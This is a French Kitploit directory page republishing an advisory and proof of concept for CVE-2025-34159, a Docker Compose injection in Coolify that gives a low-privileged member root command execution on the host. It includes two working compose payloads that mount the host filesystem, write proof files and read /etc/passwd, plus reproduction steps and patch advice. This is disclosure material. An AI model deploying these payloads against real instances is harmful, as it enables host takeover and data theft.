Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-34159 — Une vulnérabilité critique d'exécution de code à distance (RCE) existe dans le flux de travail de déploiement d'applications de Coolify. Cette faille permet à un membre à faibles privilèges d'injecter des directives Docker Compose arbitraires lors de la création ou de la mise à jour de projets. En définissant un service malveillant qui monte le système de fichiers hôte, un attaquant peut obtenir une exécution de commande au niveau racine sur | Kitploit
Outils/GitHubGitHub/eyodav/cve-2025-34159
Sécurité des ConteneursAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionSécurité CloudMauvaise ConfigurationRed Teaming

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

À propos

Une vulnérabilité critique d'exécution de code à distance (RCE) existe dans le flux de travail de déploiement d'applications de Coolify. Cette faille permet à un membre à faibles privilèges d'injecter des directives Docker Compose arbitraires lors de la création ou de la mise à jour de projets. En définissant un service malveillant qui monte le système de fichiers hôte, un attaquant peut obtenir une exécution de commande au niveau racine sur

GitHub
eyodav/cve-2025-34159

CVE-2025-34159

Voir le dépôt
15il y a 1 anPas encore vérifié
Partager

CVE-2025-34159 : Injection Docker Compose dans Coolify

Aperçu de la vulnérabilité

ChampValeur
Identifiant CVECVE-2025-34159
AffecteCoolify ≤ v4.0.0-beta.420.6
Corrigé dansv4.0.0-beta.420.7
SévéritéCritique
CVSS 4.0CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
CWECWE-78 (Injection de commandes OS), CWE-20 (Validation d'entrée incorrecte)

Résumé exécutif

Une vulnérabilité critique d'exécution de code à distance (RCE) existe dans le workflow de déploiement d'applications de Coolify. Cette faille permet à un membre peu privilégié d'injecter des directives Docker Compose arbitraires lors de la création ou de la mise à jour de projets. En définissant un service malveillant qui monte le système de fichiers hôte, un attaquant peut obtenir une exécution de commande au niveau root sur l'OS hôte, contournant complètement l'isolation des conteneurs.


Impact sur la sécurité

  • Exécution de commande arbitraire sur le système hôte avec privilèges root
  • Compromission totale de l'hôte incluant la capacité de lire/écrire des fichiers système, d'établir une persistance et d'effectuer des mouvements latéraux
  • Violation de sécurité multi-locataire compromettant potentiellement d'autres utilisateurs et équipes sur la même instance
  • Contournement des contrôles de sécurité rendant les restrictions d'accès au terminal de l'interface utilisateur (contrôles 403) inutiles

Détails techniques

Versions affectées

  • Versions vulnérables : Coolify ≤ v4.0.0-beta.420.6
  • Version corrigée : v4.0.0-beta.420.7

Vecteur d'attaque

La vulnérabilité existe dans le workflow de déploiement de projets où les configurations Docker Compose fournies par l'utilisateur sont traitées sans validation ni sandboxing suffisants.


Preuve de concept

PoC 1 : Montage de la racine de l'hôte avec exécution de commande

root@kitploit:~
version: '3.8'
services:
  poc-host-root:
    image: alpine:3.19
    tty: true
    volumes:
      - /:/host:rw
    command: >
      sh -c "
        echo '[*] Proof of RCE on host' &&
        echo 'RCE by Eyodav' > /host/tmp/proof_rce.txt &&
        whoami &&
        id &&
        uname -a &&
        head -n 5 /host/etc/passwd
      "

Résultat : Après le déploiement, /tmp/proof_rce.txt apparaît sur le système hôte, confirmant la RCE avec privilèges root.

PoC 2 : Écriture ciblée sur un chemin hôte

root@kitploit:~
version: '3.8'
services:
  poc-host-write:
    image: alpine:3.19
    tty: true
    volumes:
      - /home/eyodav/PoC:/host
    command: >
      sh -c "
        set -e;
        mkdir -p /host &&
        echo '[*] Writing PoC file to host mount...' &&
        echo RCE_PoC_from_container_$(date) > /host/RCE_PoC.txt &&
        cd /host &&
        pwd &&
        ls -la
      "

Étapes de reproduction

  1. Authentifiez-vous en tant qu'utilisateur de niveau membre (non administrateur)
  2. Créez ou modifiez un projet dans Coolify
  3. Fournissez une configuration malveillante en utilisant l'une des charges utiles Docker Compose ci-dessus
  4. Déployez le projet
  5. Vérifiez l'exploitation en recherchant des artefacts côté hôte (par exemple, /tmp/proof_rce.txt) ou en examinant la sortie de commande dans les journaux de déploiement

Actions immédiates

  1. Mettez à jour immédiatement vers Coolify v4.0.0-beta.420.7 ou ultérieur
  2. Examinez les projets existants pour détecter des configurations Docker Compose potentiellement malveillantes

Références

  • Notes de correctif/version : https://github.com/coollabsio/coolify/releases/tag/v4.0.0-beta.420.7
  • Dépôt d'avis/PoC : https://github.com/Eyodav/CVE-2025-34159
Télécharger l’outil